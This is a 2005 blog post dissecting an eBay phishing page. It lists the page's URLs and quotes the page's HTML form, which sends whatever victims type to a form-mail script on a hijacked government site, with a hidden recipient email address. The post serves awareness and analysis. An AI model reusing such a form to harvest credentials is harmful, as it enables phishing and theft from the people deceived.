Sunday, February 20, 2005

Phishing in action - part II

It looked so great, the phishing site. Because it succeeded in highjacking the URL, so that there's no need to copy the e-bay site. Let real e-bay do that work for you. But you notice it as soon as you hit the Back-button (which brings you back to where you where before the first fake e-bay page). Still the URL reveals that the original link of the Phishing site is:
http://members.aol.com/mbrserviceebay/ebay.html

And the source of that page states: *!-- saved from url=http://kok.8k.com/--*
which is a site that is no longer active.

The mail engine in the source code says:
*form method="post" action="http://www.hc-sc.gc.ca/cgi-bin/fmail.pl"*
*input type="hidden" value="giftcardz@yahoo.com" name="recipient"*
*input type="hidden" value="http://www.ebay.com" name="redirect"*
*input type="hidden" value="ebaY hiT" name="form_subject"*
*table cellSpacing="0" cellPadding="0" bgColor="#999999" border="0"*

So apparently the healt-canada site has been hijacked to serve as a mail receipt engine.